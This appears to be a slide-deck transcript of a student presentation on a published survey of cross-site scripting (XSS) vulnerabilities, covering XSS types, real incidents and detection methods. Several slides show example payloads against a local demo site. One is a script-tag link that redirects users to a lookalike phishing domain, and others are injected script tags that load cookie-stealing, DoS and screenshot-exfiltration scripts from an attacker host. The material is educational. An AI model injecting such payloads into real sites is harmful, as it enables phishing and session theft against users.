  • 1. A Survey of Exploitation and Detection Methods of XSS Vulnerabilities Miao Liu, Boyu Zhang, Wenbin Chen, Xunlai Zhang IEEE Access, Vol 7 A presentation by Gitam Gadtaula, Kathmandu University
  • 2. Outlines ❖ Introduction ❖ Classification of XSS vulnerabilities ❖ Risks caused by exploiting XSS vulnerabilities ❖ Detection method of XSS Vulnerabilities ❖ Conclusion
  • 3. Introduction ❖ A kind of vulnerabilities that can endanger web applications by injecting malicious code. ❖ The exploitation of XSS vulnerabilities can hijack users’ sessions, modify, read and delete business data of web applications, place malicious codes in web applications, and control victims to attack other targeted servers. ❖ Abbreviated as XSS to distinguish CSS. ❖ This paper discusses classification of XSS, and designs a demo website to demonstrate attack processes of common XSS exploitation scenarios. ❖ Also compares and analyzes recent research results on XSS detection, divides them into three categories; static, dynamic and hybrid.
  • 4. ❖ XSS can be traced back to the 1990s but Microsoft security engineers introduced the term "Cross-site scripting" in January 2000. ❖ The Internet security threat report in 2019 shows, phishing attacks and form hijacking caused by exploiting XSS vulnerabilities bring huge losses to enterprises. Symantec intercepted more than 3.7 million forms hijacking attacks in 2018. ❖ In 2006, Bantown, a hacker organization, exploited the discovered XSS vulnerabilities to invade LiveJournal which is an online community with 2 million active users. ❖ The attacker created a large number of URLs containing malicious code and lured users to click. When victims clicked these URLs, the attacker could get cookies from users and used these cookies to login the victims’ accounts.
  • 5. THE CLASSIFICATION OF XSS VULNERABILITIES According to untrusted user supplied data included in an HTTP response generated by the server or is somewhere in the DOM of HTML pages, XSS vulnerabilities could be divided into server-side vulnerabilities and client-side vulnerabilities. The server-side XSS vulnerability mainly includes reflected XSS and stored XSS. The client-side vulnerability refers to DOM Based XSS.
  • 6. DOM based XSS DOM Based XSS is also known as type-0 XSS. It is caused by unsafe client-side code rather than server-side code. This sort of vulnerability may occur on pages containing JavaScript code such as document.write() or eval(). The attacker creates a link with malicious JS code and sends it to the victim. When the victim clicks on the link, he will get a response without malicious code. The malicious code executes at the client side and the attacker can obtain sensitive information from the victim.
  • 8. STORED XSS Stored XSS is also known as type-1 XSS. This kind of vulnerability is likely to occur in websites such as forums or blogs. The attacker puts the malicious code in his submissions to websites, and websites store these submissions in databases directly. When the victim browses these contents, the XSS attack will be triggered.
  • 10. Reflected XSS Reflected XSS is also known as type-2 XSS. The process of reflected XSS attack is similar with DOM Based XSS, and the difference is that malicious code is included in the response of websites. Attackers usually insert malicious scripts into a URL and lure users to click on it. When the victim clicks on the link, he will get the response with malicious code from the website. The attacker will get sensitive data through malicious code execution. Unlike DOM Based XSS vulnerabilities, reflected XSS is a server-side vulnerability. Malicious code is parsed at the server-side rather than at the client-side.
  • 12. RISKS CAUSED BY EXPLOITING XSS VULNERABILITIES In this section, authors created a demo website to illustrate how to exploit XSS vulnerabilities. The demo website is deployed locally and the domain name is www.phpbegin.local
  • 13. A. PHISHING ATTACK Authors created a malicious website (http://www. phpbegim.local) with the same login display effect with our demonstrated website (http://www.phpbegin.local). It’s worth noting that URLs are the same except for one letter. Then they forged a malicious link (http://www.phpbegin.local/login.php?userName=<script>window.location.href=’’www. phpbegim.local/login.php’’;</script>&password=&submit=), sent it to a user via email and lured the user to click on it. When the user clicked the malicious link, the user entered his username and password and clicked the login button. Authors used the code to redirect the user to the normal website, and stored his username and password in the database. The user logged in the website normally without being aware that his username and password had been stolen.
  • 15. B. Steal cookies The attacker stores a file cookis.js including some malicious code in the directory /myjs of the malicious website and then posts some submission including <script src="http://www.phpbegim.local/myjs/cookis.js"></script> to the demonstrated website. When users access the pages containing the above submission, the demonstrated website will send responses to users. The malicious code will be executed and the attacker will receive users’ cookies. In the end, the attacker can use some penetration test tool to replace his cookie value with the stolen cookie value, and then he can login in the demonstrated website by counterfeiting users.
  • 17. C. DOS attack The attacker stores a file dos.js in the directory /myjs of the malicious website, and then posts some submission including <script src="http://www.phpbegim.local/myjs/dos.js"></script> to the demonstrated website. The dos.js code will insert large invalid data to cookies. When users access the pages containing the attacker’s submission, the malicious code is executed, and a lot of invalid data is injected into users’ cookies. When users browse the demonstrated website again, they will get 400 errors, because the website cannot parse cookies which have a large amount invalid data.
  • 19. D. DDOS Attack In 2014, Incapsula, the Japan’s cloud security service provider, reported a Stored XSS in one of the world’s largest video websites. The attacker inserted malicious JavaScript code into <img> tag of a user’s custom avatar and published a lot of comments on many videos with the custom avatar. When legitimate users browsed these videos, the malicious code was executed and added a hidden <iframe> tag with a tool based Ajax script that can send a request to the targeted server per second. The more users watched these videos, the more requests were sent to the targeted server, which in turn caused the targeted server to exhaust all resources and not respond to normal user requests any more.
  • 21. E. Stealing Browsers screenshot The attacker stores a file shot.js in the directory /myjs of the malicious website, and then posts some submission including <script src="http://www.phpbegim.local/myjs/shot.js"> </script> to the demonstrated website. The shot.js code will copy and send victim’s screenshots to the malicious website. When users access the pages containing the attacker’s submission, the script takes a screenshot of the browser, sends it back to the malicious website. The attacker can then decode the received data to view the image.
  • 23. F. XSS Worms XSS Worm is a malicious (or sometimes non-malicious) payload, that breaches browser security to propagate among visitors of a website in the attempt to progressively infect other visitor. In 2011, Sina Weibo, a similar website with Twitter in China, received an attack from a XSS worm. Once the user was attacked by the worm, the user would automatically send some microblogs to their fans to entice them to click. Once fans clicked on this Weibo to view the details, they would be infected and repeated the above steps, which would cause the worm to spread quickly.
  • 25. Detection method of XSS Vulnerabilities ❖ Different detection methods have different analysis mechanisms ➢ Static analysis ➢ Dynamic analysis ➢ Hybrid analysis
  • 28. Hybrid Analysis Hybrid analysis methods have the advantages of static analysis and dynamic analysis. They can not only detect all paths in the source code, but also get low false positive rate. In hybrid analysis, static analysis are used to find potential vulnerabilities in applications and improve the detection speed. Dynamic analysis are mainly used to verify XSS vulnerabilities. However, hybrid analysis methods also inherit the shortcomings of static analysis. Some of the hybrid analysis methods can only be applied to a single language, which makes them not very popular.
  • 29. Conclusion ❖ XSS vulnerabilities are mainly caused by not properly filtering users’ inputs, such as the wrong order in which the encoding function is applied ❖ Although there are many methods to detect XSS vulnerabilities, it is still a very difficult task to detect all XSS vulnerabilities in one web application. This is mainly because the size of web applications is becoming larger, and the calling logic among modules is also becoming more complicated. ❖ The methods discussed in this paper have their own advantages and disadvantages, and so far there has not been a perfect method. ❖ Therefore, if a web application needs to prevent XSS vulnerability attack perfectly, multiple methods must be used comprehensively.

Editor's Notes

  • #26: Based on the difference of their working mechanisms